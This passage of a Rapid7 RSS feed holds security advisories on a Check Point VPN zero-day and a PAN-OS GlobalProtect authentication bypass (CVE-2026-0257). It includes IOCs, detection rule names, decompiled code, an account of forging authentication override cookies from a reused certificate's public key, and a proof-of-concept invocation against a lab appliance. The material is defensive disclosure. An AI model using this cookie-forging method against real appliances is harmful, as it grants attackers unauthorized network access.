style="direction: ltr;"><span style='font-size: undefined;'>Enable IPS and download the latest signatures</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 strongly recommends looking for signs of compromise even after the hotfix has been applied. Per Check Point's advisory, incident response teams should prioritize forensic log audits and configuration reviews starting from May 7, 2026, the earliest known date of exploitation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the </span><a href="https://support.checkpoint.com/results/sk/sk185033"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3>Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-50751 with a vulnerability check available in the June 9 content release.</span></p><h3>Intelligence Hub</h3><p style="direction: ltr;"><span style='font-size: undefined;'>IntelHub customers can look into the platform to search for more details and correlate the indicators of compromise, like known malicious IPs and known post exploitation ELF payloads, with the data from their own environment.</span></p><h3>Managed Detection Response (MDR)</h3><p>The following detection rules are available for InsightIDR and Managed Detection Response (MDR) customers:</p><ul><li><p>Suspicious Network Connection - Critical Check Point VPN Zero-Day Exploited in the Wild (CVE-2026-50751)</p></li><li><p>Suspicious Process - Critical Check Point VPN Zero-Day Exploited in the Wild (CVE-2026-50751)</p></li></ul><h2 style="direction: ltr;">Indicators of compromise</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point has published the following indicators associated with the CVE-2026-50751 exploitation campaign. The attacker infrastructure consists of VPS hosts from several providers (Kaupo Cloud HK, Shock Hosting, Vultr Holdings), and Check Point notes that in some cases, the VPS region matched the geography of the targeted organization.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>IP addresses:</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>45.77.149[.]152</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>209.182.225[.]136</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>38.60.157[.]139</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>162.33.177[.]101</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>45.76.26[.]42</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>144.208.127[.]155</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>38.54.88[.]201</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>38.54.107[.]167</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>66.42.99[.]200</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>File hashes (MD5):</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>52fda5c1b9704544f32ee98d9060e689</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>51d39aa39478beeac94f2d12f682ecce</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point observed post-exploitation attempts to retrieve ELF payloads from attacker-controlled servers, and identified ties to the Qilin ransomware operation based on binary analysis. For the full and most current list of IOCs, please refer to the </span><a href="https://blog.checkpoint.com/security/check-point-releases-important-hotfix-for-vulnerabilities-in-deprecated-ikev1-vpn-protocol/"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 8, 2026</strong></span><span style='font-size: undefined;'>: Initial publication.</span></p></li><li><span style='font-size: undefined;'><strong>June 8, 2026</strong></span>: Rapid 7 observations of EITW.</li><li><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 9, 2026: </strong></span><span style='font-size: undefined;'>CVE added to CISA KEV.</span></p></li><li><span style='font-size: undefined;'><strong>June 10, 2026: </strong></span><span style='font-size: undefined;'>Updated to reflect availability of a vulnerability check and information for Intelligence Hub customers. </span></li><li><span style='font-size: undefined;'><strong>June 11, 2026: </strong></span><span style='font-size: undefined;'>Additional exploitation information determined by Rapid7.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-critical-check-point-vpn-zero-day-exploited-in-the-wild-cve-2026-50751</link>
      <guid isPermaLink="false">bltcf427fa6ec355a76</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 08 Jun 2026 17:05:16 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Observed Exploitation of PAN-OS GlobalProtect Authentication Bypass Vulnerability (CVE-2026-0257)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On May 13, 2026, Palo Alto Networks published a security </span><a href="https://security.paloaltonetworks.com/CVE-2026-0257"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for CVE-2026-0257, a medium severity authentication bypass affecting PAN-OS and Prisma Access when a specific configuration is present. Successful exploitation of this vulnerability allows a remote unauthenticated attacker to successfully establish a VPN connection through the GlobalProtect gateway of an affected appliance.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 MDR identified successful exploitation across numerous customers, however we did not observe any indication of successful lateral movement from the devices. The earliest date for observed exploitation was May 17, 2026.  As of May 29, 2026,  this vulnerability has been added to the CISA KEV.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The CVE was originally assigned a CVSSv4 score of 4.7, </span><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N/E:U/AU:N/R:A/V:D/RE:M/U:Amber"><span style='font-size: undefined;'>medium</span></a><span style='font-size: undefined;'> severity. Due to the circumstances surrounding this vulnerability Rapid7 urges that organizations treat this as a critical vulnerability. An authentication bypass in an edge facing enterprise VPN appliance can have significant impact to affected organizations. As such, organizations running affected appliances are urged to upgrade to a vendor supplied patch on an urgent basis.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Note that, as of May 29, Palo Alto Networks updated their security </span><a href="https://security.paloaltonetworks.com/CVE-2026-0257"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> to reflect a change in the CVSS score. The CVSSv4 score was changed from 4.7 to 7.8, with high severity to inform their customers to patch with the highest urgency. </span></p><h2 style="direction: ltr;">Observed Attacker Behavior</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On 2026-05-18 01:51:37 UTC, Rapid7 MDR responded to a 'Suspicious VPN Authentication - Local Account Logon via Generic Non-Human Identity' alert. During the initial investigation, Rapid7 observed a suspicious cookie authentication to the local admin account across multiple customer environments from the same hosting provider, Vultr.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="html">&lt;14&gt;May 18 01:51:37 palovpn-01 1,2026/05/18 01:51:37,010101010101,GLOBALPROTECT,0,2817,2026/05/18 01:51:37,vsys1,gateway-auth,login,Cookie,,admin,US,GP-CLIENT,104.207.144.154,0.0.0,0.0.0.0,0.0.0.0,aa:bb:cc:dd:ee:ff,,6.0.0,,Linux,"linux-64",1,,,"Auth latency: 78ms, profile: local_auth_profile",success,,0,,0,GP-Gateway,0101010101010101010,0x0,2026-05-18T01:51:37.264-05:00,,,,,,0,0,0,0,,palovpn-01,1,",</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>GlobalProtect Authentication Log</em></span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 MDR analyzed the Palo Alto tech support files across the impacted customers and observed that Cloud Authentication Service (CAS) was disabled and the GlobalProtect portal or gateway had authentication override cookies enabled. Based on these findings, MDR analysts concluded that this was likely exploitation of CVE-2026-0257. Subsequent analysis by Rapid7 Labs confirmed this was accurate by validating a successful proof-of-concept.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 MDR observed a second wave of exploitation on May 21st. Due to the consistent MAC address, Rapid7 believes both waves of exploitation are likely from the same threat actor (TA). However, the second wave of compromises originated from the hosting provider, Dromatics Systems. In this wave of exploitation, Rapid7 observed VPN IP assignment following the cookie authentication, granting them access to the internal network. </span>Rapid7 observed POST requests to <span data-type='inlineCode'>/ssl-vpn/hipreport.esp</span> and <span data-type='inlineCode'>/ssl-vpn/getconfig.esp</span> in the cases where a VPN tunnel was successfully established. The first submits security profile information and the second to establish the secure tunnel.<span style='font-size: undefined;'> </span>Across multiple customers, Rapid7 observed successful exploitation via authentication probes using forged cookies, but the appliance accepted the cookie without a full VPN session being established in 8 out of 10 impacted MDR customers.</p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="html">&lt;14&gt;May 21 01:54:39 FW-PA-A 1,2026/05/21 01:54:38,010101010101,GLOBALPROTECT,0,2818,2026/05/21 01:54:38,vsys1,gateway-auth,login,Cookie,,admin,US,DESKTOP-GP01,146.19.216.125,0.0.0.0,0.0.0.0,0.0.0.0,aa:bb:cc:dd:ee:ff,,6.0.0,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,"Auth latency: 1019ms, profile: SAML-o365-GP",success,,0,,0,GlobalProtect_External_Gateway,0101010101010101010 ,0x8000000000000000,2026-05-21T01:54:39.142-05:00,,,,,,30,241,35,0,,FW-PA-A,1,,",</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>GlobalProtect Authentication Log</em></span></p><h2 style="direction: ltr;">Technical Analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Per the vendor advisory, we know the issue lies in a feature called “authentication override”. This feature allows a GlobalProtect portal or gateway to issue cookies to an authenticated user. The authenticated user can then use an authentication override cookie in future communications to the GlobalProtect portal or gateway in lieu of re-authenticating via credentials, akin to a bearer token. This is not a feature that is enabled by default.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>We also know from reading the vendor advisory that the vulnerability requires a certain configuration in how certificates are used to encrypt and decrypt these authentication override cookies. Specifically, the certificate used to encrypt and decrypt authentication override cookies must not be the same certificate used for the GlobalProtect portal or gateway’s HTTPS service. This is a significant clue to how the vulnerability works.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>To explore what an authentication override cookie looks like and how they are created, we can look at the implementation in the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/usr/local/bin/gpsvc</span></span><span style='font-size: undefined;'> binary which implements the GlobalProtect service (Our testing appliance was running PAN-OS </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.2.8</span></span><span style='font-size: undefined;'> in a vulnerable configuration). Inspecting the </span><span style='font-size: undefined;'><span data-type='inlineCode'>main_DoAuthLogin</span></span><span style='font-size: undefined;'> function, we see that if a HTTP form value of either </span><span style='font-size: undefined;'><span data-type='inlineCode'>portal-userauthcookie</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>portal-prelogonuserauthcookie</span></span><span style='font-size: undefined;'> is present during a POST request to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/ssl-vpn/login.esp</span></span><span style='font-size: undefined;'>, authentication will be performed by a call to </span><span style='font-size: undefined;'><span data-type='inlineCode'>main_AuthWithCookie</span></span><span style='font-size: undefined;'>. This function will take the incoming encrypted cookie value stored in either </span><span style='font-size: undefined;'><span data-type='inlineCode'>portal-userauthcookie</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>portal-prelogonuserauthcookie</span></span><span style='font-size: undefined;'>, decrypt it and extract the cookies user name, domain name, host id, client OS, remote address, and timestamp (as auth override cookies have a lifetime after which they will expire).</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="c">void __gostk main_AuthWithCookie(
        main_GpTask_0 *t,
        paloaltonetworks_com_libs_common_AuthProfile *authProfile,
        string authCookie,
        string key,
        string stage,
        uint32 cookieLifetime,
        uint32 eventId,
        uint32 netMask,
        bool checkSrcIp,
        main_authResult_0 *result,
        string defaultDescription)
{
// ...

  ts = 0;
  errorCode = 0;
  user = 0;
  domain = 0;
  hostId = 0;
  clientOs = 0;
  remoteAddr = 0;
  result-&gt;retCode = 0;
  startTime = time_Now();
  result-&gt;cookie_auth_status = -1;
  t-&gt;Variables.authMethod.len = 6;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
    runtime_gcWriteBarrier();
else
t-&gt;Variables.authMethod.str = (uint8 *)"Cookie";
  str = authProfile-&gt;AuthProfileName.str;
  t-&gt;Variables.authProfile.len = authProfile-&gt;AuthProfileName.len;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
    runtime_gcWriteBarrier();
else
t-&gt;Variables.authProfile.str = str;
  v27 = main_DecryptAppAuthCookie(t, authCookie, key, &user, &domain, &hostId, &clientOs, &remoteAddr, &ts);</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>If we look at the </span><span style='font-size: undefined;'><span data-type='inlineCode'>main_DecryptAppAuthCookie</span></span><span style='font-size: undefined;'> function we can begin to see the problem. The incoming encrypted cookie is base64 decoded and then decrypted using a private key. The decrypted content is then trusted implicitly, with no signature verification of any kind occurring after decryption.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="c">error __gostk main_DecryptAppAuthCookie(
        main_GpTask_0 *t,
        string authCookie,
        string privateCert,
        string *user,
        string *domain,
        string *hostId,
        string *clientOs,
        string *remoteAddr,
        int64 *ts)
{
// ...

  if ( privateCert.len )
  {
    *(retval_95DD80 *)&text[48] = paloaltonetworks_com_libs_common_DecryptRsaPrivateWithBase64Std(
                                    privateCert,
                                    (string)0LL,
                                    authCookie);</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The implication here is that anyone who knows the public key for the certificate used by the authentication override feature to encrypt and decrypt cookies, can successfully forge and encrypt an arbitrary authentication override cookie. The question then becomes, how does an attacker learn the correct public key to use in this attack?</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>This brings us back to the vendor's advisory where they state “do not reuse the portal or gateway certificate, and do not share this certificate with other features or users”.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>If a GlobalProtect portal or gateway has reused the certificate for encrypting and decrypting cookies with another feature, such as the HTTPS service of the portal or gateway, then a remote unauthenticated attacker can discover the public key for that certificate. In doing so the attacker will be able to successfully forge and encrypt arbitrary authentication override cookies. As these forged cookies will be successfully decrypted server side, they will be trusted and an authentication bypass will be achieved. An attacker can use a valid forged authentication override cookie to login and establish a VPN connection.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition to Exposure Command and InsightVM customers being able to assess their exposure with authenticated checks, a publicly available </span><a href="https://github.com/sfewer-r7/CVE-2026-0257"><span style='font-size: undefined;'>proof-of-concept script</span></a><span style='font-size: undefined;'> to test if an appliance is vulnerable to CVE-2026-0257 has been developed by Rapid7 Labs. The script will retrieve all certificates in the chain for the HTTPS service of either a GlobalProtect portal or gateway. Each certificate in the chain is iterated over and an authentication override cookie is forged using each certificate's public key. This forged cookie is then tested against the GlobalProtect portal or gateway, and the script reports back if authentication was successful or not. </span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The usage of the script is shown below.</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">$ python3 forge_cookie.py --help
usage: forge_cookie.py [-h] --target TARGET [--port PORT] [--user USER] [--domain DOMAIN] [--host-id HOST_ID] [--client-os CLIENT_OS] [--client-ip CLIENT_IP] [--context {gateway,portal,both}] [--verbose]

Forge a GlobalProtect auth override cookie using the public key from TLS (CVE-2026-0257).

options:
  -h, --help            show this help message and exit
  --target TARGET       Target GP portal/gateway IP/hostname
  --port PORT           Target port (default: 443)
  --user USER           Username to forge cookie for (default: admin)
  --domain DOMAIN       Domain for cookie (default: empty)
  --host-id HOST_ID     Host ID for cookie (default: empty)
  --client-os CLIENT_OS
                        Client OS for cookie (default: Windows)
  --client-ip CLIENT_IP
                        Client IP in cookie (default: 0.0.0.0)
  --context {gateway,portal,both}
                        Context to test: gateway, portal, or both (default target)
  --verbose             Print full response</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>A successful invocation of the script against a vulnerable appliance is shown below. We can see the target's GlobalProtect gateway accepted a forged authentication override cookie using the second certificate in the chain.</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">$ python3 forge_cookie.py --target 192.168.86.99 --user haxor
[*] Retrieving certificate chain from 192.168.86.99:443 ...
  Found 2 certificate(s) in chain:
  [0] CN=192.168.86.99 (RSA 2048 bits, CA=False)
  [1] CN=GP-Lab-CA (RSA 2048 bits, CA=True)

[*] Forging cookie for user 'haxor', testing each key

  Trying [0] CN=192.168.86.99
  [-] Failure - Gateway did not accepted the forged cookie
  [-] Failure - Portal did not accepted the forged cookie

  Trying [1] CN=GP-Lab-CA
  [+] Success - Gateway accepted the forged cookie
  Cookie: ng9ygxlaclylNXeSHcakXZPK06Fno0svVirz6RhRtA5mDmOaZyg/KMxUuM5lRvm1Rn1Z6vqaWQQPvQOHzwJnyldOmhUKy+HDMgIYtJ/kk3ypMqmFE7BbmPxnSKxKcQQbNIcxgkrhCwuJKwybuq0aaPVNzN9BSWmh1QmZj7oLjTEo9ExAXrm951mqYhh3+MgBCScaYqP23WzrC+vzqJB74sHoMUuFWIF8/sMYDMpvENOoI4nXAFCaRYSruW9FQQy5VTzNifNWkrYcdzDCXKiP8v4G098/2QoBbVoyHBZwbgHGBsRU3ZeSgoHjrhjxyotIshKVssUs8CRpuG2HlZBM0Q==</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>We can observe the successful authentication via the management interface, as shown below. The two initial failures correspond to the first certificate being used which was the incorrect certificate.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1913d15e22afec9d/6a19c11b937e6e3ee9aed268/pan-os-monitor-gpsrv.png" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="pan-os-monitor-gpsrv.png" asset-alt="pan-os-monitor-gpsrv.png" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1913d15e22afec9d/6a19c11b937e6e3ee9aed268/pan-os-monitor-gpsrv.png" data-sys-asset-uid="blt1913d15e22afec9d" data-sys-asset-filename="pan-os-monitor-gpsrv.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="pan-os-monitor-gpsrv.png" sys-style-type="display"/></figure><p style="text-align: center;"><span style='font-size: undefined;'><em>Figure 1: PAN-OS Management Interface</em></span></p><h2 style="direction: ltr;">Mitigation Guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>According to the Palo Alto Networks advisory, the following product versions are affected by CVE-2026-0257:</span></p><p></p><table><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Product</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Affected</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Unaffected</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 12.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 12.1.4-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 12.1.7</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 12.1.4-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 12.1.7</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 11.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.4-h17</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.7-h14</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.10-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.12</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.4-h17</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.7-h14</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.10-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.12</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 11.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.7-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.7-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.15</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 10.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.7-h34</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.13-h21</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.16-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.18-h6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.7-h34</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.13-h21</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.16-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.18-h6</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Prisma Access 11.2.0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.7-h13</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.7-h13</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Prisma Access 10.2.0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.10-h36</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.10-h36</span></p></td></tr></tbody></table><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Affected products must have the authentication override feature enabled in either the GlobalProtect portal or gateway, and must reuse the authentication override cookie encryption and decryption certificate with another feature in order to be vulnerable. As a mitigation, affected products should either disable the authentication override feature or generate a new certificate to use exclusively for the authentication override feature.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Please refer to the vendor </span><a href="https://security.paloaltonetworks.com/CVE-2026-0257"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for the latest guidance.</span></p><h2 style="direction: ltr;">Rapid7 Customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Managed Detection Response (MDR)</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The following detection rules are available for InsightIDR and Managed Detection Response (MDR) customers:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Authentication - Palo Alto GlobalProtect Cookie Authentication to Local Admin Account</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Threat Intel (Rapid7 MDR SOC/IR) - VPN Authentication via Spoofed MAC Address</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Threat Intel (Rapid7 MDR SOC/IR) - Indicator of Compromise Observed </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious VPN Authentication - Palo Alto GlobalProtect Login via Default Hostname</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious VPN Authentication - Local Account Logon via Generic Non-Human Identity</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious VPN Authentication - Local Account</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Authentication - Vultr</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Authentication - Dromatics Systems</span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-0257 using an authenticated check available since the May 15 content release.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>IntelHub</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>IntelHub customers can look into the Platform to search for more details and correlate the indicators of compromise with the data from their own environment.</span></p><h2 style="direction: ltr;">Known Indicators of Compromise</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Low-cost hosting providers; frequent origin of sustained threat campaigns.</span></p><p></p><table><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Item</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>104.207.144.154</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Threat actor source IP</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>146.19.216.119</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Threat actor source IP</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>146.19.216.120</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Threat actor source IP</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>146.19.216.125</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Threat actor source IP</span></p></td></tr><tr><td><p>209.99.191.137</p></td><td><p>Threat actor source IP</p></td></tr><tr><td><p>79.130.26.202</p></td><td><p>Threat actor source IP</p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>DESKTOP-GP01</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Machinename observed in the GlobalProtect logs alongside Windows authentications first observed on May 21, 2026</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>GP-CLIENT</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Machinename observed in the GlobalProtect logs alongside Linux authentications first observed on May 17, 2026</span></p></td></tr><tr><td><p>Jocker</p></td><td><p>Machinename observed alongside 79.130.26.202</p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>aa:bb:cc:dd:ee:ff</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Spoofed MAC address observed in both waves of successful exploitation</span></p></td></tr></tbody></table><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><strong>May 29, 2026: </strong>Initial publication.</li><li><strong>May 29, 2026: </strong>Added CISA KEV addition. </li><li><span style='font-size: undefined;'><strong>June 2, 2026: </strong></span><span style='font-size: undefined;'>Added IntelHub information under Rapid7 Customers section, updated to reflect Palo Alto Networks change to security advisory (CVSS score change). </span>Added 3 new IOCs (2 IPs and 1 machinename).</li><li><span style='font-size: undefined;'><strong>June 3, 2026:</strong></span><span style='font-size: undefined;'> Added observed URI endpoints accessed for successful VPN connections to the Observed Attacker Behavior section.</span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-rapid7-observed-exploitation-of-pan-os-globalprotect-authentication-bypass-vulnerability-cve-2026-0257</link>
      <guid isPermaLink="false">bltacc9bfccc9e39c81</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Fri, 29 May 2026 16:49:40 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
  </channel>
</rss>